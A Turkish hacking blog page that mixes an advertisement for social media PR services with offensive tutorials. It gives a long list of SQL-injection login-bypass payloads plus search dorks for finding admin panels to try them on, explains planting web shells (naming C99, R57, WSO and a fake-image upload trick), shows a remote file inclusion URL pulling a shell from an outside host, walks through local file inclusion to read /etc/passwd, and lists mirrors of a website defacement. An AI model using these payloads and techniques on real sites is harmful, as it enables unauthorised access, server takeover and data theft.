PR DANIŞMANI & SOSYAL MEDYA UZMANLIGI


Sosyal Medya Reklamları Nedir?

Birçok sosyal medya platformunda uygulanabilen, platforma belirli bir ücret ödenerek daha fazla kişiye erişim sağlanan reklam modelleridir. Oldukça düşük maliyetlidir ve reklam amacına ulaşmadan ücret ödenmez. Çok iyi hedef kitle belirlemesi yapılabilir. Örneğin sadece çocuğu olan ailelere ya da sadece iPhone kullanan kişilere reklamınızı gösterebilirsiniz. Bu da sizi gereksiz harcama yapmadan en doğru hedef kitleye ulaşmanızı sağlar. Sosyal medya reklam modelleri, doğru uygulandığında çok uygun bütçelerle oldukça fazla fayda sağlayabilir sosyal medya reklam modelleri. Geleneksel medyaya göre sayılamayacak kadar çok avantajı vardır.  Bunları profesyonel olarak Sosyal medya ajansları, Sosyal medya danışmanlığı şeklinde sosyal medya reklamlarını kullanarak yapmaktadır.
ILETISIM : +90 553 266 9553 VEYA DM

Login bypass

 Merhabalar konumuz login bypass. Öncelikle login bypass bir sql çeşidir.

Login bypass hedef sitenin /admin paneline yetkili olarak giriş yapmamızı sağlıyor.

örnek resimde gördüğümüz gibi sitenin paneli neyse örnek /admin /panel /setup /yonetici /administrator/yonetim vs. sık kullanılan admin panelleridir.

admin ve şifreye ;

Aşağıdaki kodlardan herhangi birini deniyerek giriş yapmayı deneyebiliriz. Bu kodlar çoğaltılabilir.

kullanıcı adı ve şifeye aynı kodu yazıyoruz arkadaşlar
kullanıcı acına ' or ''=' yazdıysak şifreyede aynısını yazıyoruz.
'1'='1
admin' or '1'='1
' or ''='
'or'1'='1 (güncel)
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*


' or true--
') or true--
') or ('')=('
') or 1--
') or ('x')=('
" or true--
" or ""="
" or 1--
" or "x"="
") or true--
") or ("")=("
") or 1--
") or ("x")=("
')) or true--
')) or ((''))=(('
')) or 1--
')) or (('x'))=(('
'-'
'+'
'&'
'^'
'*'
' or ''-'
' or ''+'
' or ''&'
' or ''^'
' or ''*'
"-"
"+"
"&"
"^"
"*"
" or ""-"
" or ""+"
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x

Denemeniz için bazı dorklar;inurl:administrator.asp 
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:login.php
inurl:login.asp
inurl:login.aspx

Shell Nedir ? Ne işe yarar ?

Shell Nedir ?
        Shell siteye atıldığı zaman sitedeki yetkiye göre dosya düzenleyip editlemeye yeni dosya upload etmeden dosya isminini değiştirmeye sistemdeki her şeyi görmeye yarar. Permissionları açık bir sunucuda sunucunun sahibi sizsiniz demektir istediğiniz gibi at koşturabilirsiniz sunucuda. Eğer permissionları açık bir sunucuda değilseniz sunucu server modülüne göre bir exploit bulup sunucuyu backconnect olup rootlamanızgerekmektedir.Sunucuyu rootlarken config çekebilirsiniz bu da size sunucudaki bütün sitelerin database bilgilerini sağlamaktadır. Bu databaseleri kullanarak shellinizdeki sql ile database username ve passwordları kullanarak sunucudaki sitelere bağlanabilir o sitenin username passwordunu değiştirebilir ve ardından dilerseniz o siteyede shell sokabilirsiniz.

Shell Nasıl atılır ?
      Shell atmak için sitenin panelinde olmanıza gerek yok. Tabii panelde olsanız shell sokamazsınız diye bir kaide yok bu panelin size verdiği yetkiye bağlı birazda. Siteye shell atmak için çeşitli açıklardan bazılarını sıralıyalım.
  • RFI (Remote File İnclusion)
  • LFI (Local File İnclusion)
  •  Scriptteki paneldeki upload dosya yükleme açıklarından faydalanabilirsiniz.
  • Sql injection ile komut çalıştırabilir siteden veri çekebilir veya zararlı yazılım sokabilirsiniz.
  • Sitenin scriptine ya da sunucuya göre exploitlerden yararlanır shell sokabilir admin şifrelerine ya da database gibi çeşitli bilgilere ulaşabilirsiniz.
  • Site yöneticisi ile temasa geçip "sosyal mühendislik" becerilerinizi konuşturarak shell atabilirsiniz.
  • ISS açığından yararlanırız bu açık en kolay bulunan açıktır %30 olarak raslanan bir açıktır.
  • Web sitede açık bulamadığımız takdirde ise sitenin ip adresini whois çekerek bulup sunucudaki diğer açıklı sitelerden birisine shell atar config çekip hedef siteye ulaşmayı deneyebiliriz.
  • Bazı site panellerinde .php dosyası kabul etmez sadece .jpg, .png, .jpeg, .gif gibi uzantıları kabul etmektedir bu sorunla karşılaştığımızda ise shellimizi "shell.php.jpg" şeklinde atabiliriz. Shellimizi baş satırına " GIF89;a" koymamızda fayda var tabii.

Popüler Shell isimleri nelerdir ?
  • R57
  • C99 - C100
  • ASPX
  • SADRAZAM
  • ASP SHELL
  • WSO
  • B374
  • K2LL33D
  • FSO SHELL

RFI (Remote File İnclusion)

RFI (Remote File İnclusion) örneği verelim;

include(“$hakkimda/yeni/haber.php”);

Hatamız bu satırdaki "$" parametresinden doğmaktadır. Bu sayede uzaktan dosya çağırmam mümkün oluyor.

http://www.hedefsite.com/index.php?hakkimda=http://shelladres.com/shell.txt?

 Yukarıdaki kodda olduğu gibi "shell.txt?" adresinde bulunan shell (zararlı kod) hedefsite.com üzerinde çalışmaktadır. Sanki o shell o sitedeymiş gibi çalışma sağlamaktadır. Bu sayede sitenin bize vermiş olduğu izinler doğrultusunda siteye istediğimiz dosyayı sokabilir (upload edebilir), istediğimiz dosyanın içeriğini kodlarını vb görebilir ve isimlerini değiştirebiliriz.

red-hack.org hacked

http://www.red-hack.org
Zone Mirror:
http://zone-h.org/mirror/id/24963647
http://www.hack-mirror.com/307810.html
http://mirror-az.com/defacements/id/862786
http://golgeler.net/view-%3E344936
http://z0n.org/mirror/id/69698
http://z0n.ir/site-goster.html&s=155867
http://dark-h.org/deface/id/208182
 https://twitter.com/PressHaberCom/status/642103497698189312


 11 Eylülde bu haberi paylaşıp ardından alan adlarını ve bloglarını aktif hale getimeye çalışan red hack'a birisi Türk firmalarındaki açıklardan bahsetmemiş :)




Ajanlar Habertürk'te

.htaccess Klasör Şifreleme

Web sitemizde herhangi bir klasörü şifrelemek için .htaccess ile klasörü şifreleyebiliriz. Nasıl mı ?
Şifrelemek istediğimiz klasöre FTP yoluyla .htaccess diye dosya ekliyoruz ve içine;



AuthType Basic
AuthName "Buraya herhangi bir açıklama yazıyoruz"
AuthUserFile home/furkan/public_html/admin/.htpasswd
<Limit GET>
require valid-user
</limit>


ardından aynı klasöre .htpasswd dosyası açıyoruz ve onun içine ise http://www.htaccesstools.com/htpasswd-generator/ buradan oluşturduğumuz k.adı ve şifreyi giriyoruz, Örnek;
furkan:$apr1$Y.jGT.Ac$PKrMXnXUwjlk6z7KDIxlS/
bunları yaptıktan sonra  şifrelediğimiz klasöre girdiğimiz zaman karşımıza böyle bir giriş geliyor koyduğumuz şifreyi girerek bu kısmı geçiyor ve klasörün arayüzüne ulaşmış oluyoruz.

Blogger Tema Çekme


Blogger bir web sitenin temasını nasıl xml olarak alırız ?
Örnek olarak kendi sitemi vereyim..

fragersec.com/atom.xml?redirect=false&start-index=1&max-results=500

kırmızı olarak yazılan yazıyı görüldüğü gibi sitenin sonuna ekliyoruz ve       

resimde görüldüğü gibi kodlar xml olarak karşımıza geliyor. Masaüstümüzde bir  isim.xml dosyası oluşturuyoruz ve bu kodları copy paste yapıp oraya ekleyip kayıt ediyoruz. Ardından blogger sayfamıza upload ediyoruz işlem bu kadar. Edit kısmıda size kalıyor tabi :)

LFI Açığı

Merhaba arkadaşlar, LFI açığından bahsedelim öncelikle bu açığın açılımı:

LFI (Local File Inclusion) : Yerelden dosya ekleyerek kod çalıştırmaktır.

Bir LFI örneği verelim;

index.php dosyası: 
<?php
include($_GET[‘sayfa’])
?>

GET komutundan daha öncede bahsetmiştik bu gibi kod içeren web sitelerin bağlantıları genelde şöyle olur:

index.php?sayfa=hakkimizda.php
index.php?sayfa=iletisim.php

Site url sinin sonuna index.php?sayfa=../../../../../../../../../etc/passwd getirerek sitenin zayıflığını bulmuş ve oluşturmuş oluruz.

../ bunun ne anlama geldiğini merak etmişsinizdir :) Bir üst dizine çıkmamızı sağlar ve sunucunun  etc/passwd user listesini ekrana yazdırır.

Lfi tespit etmek için linuxte "/etc/passwd", windowsta "c:\boot.ini" dosyasını include etmeye çalışabilirsiniz. “/etc/passwd” dosyası linux kullanıcı isimlerini ve dizin yollarını verecektir. Şuna benzer bi görünümle karşılaşılır: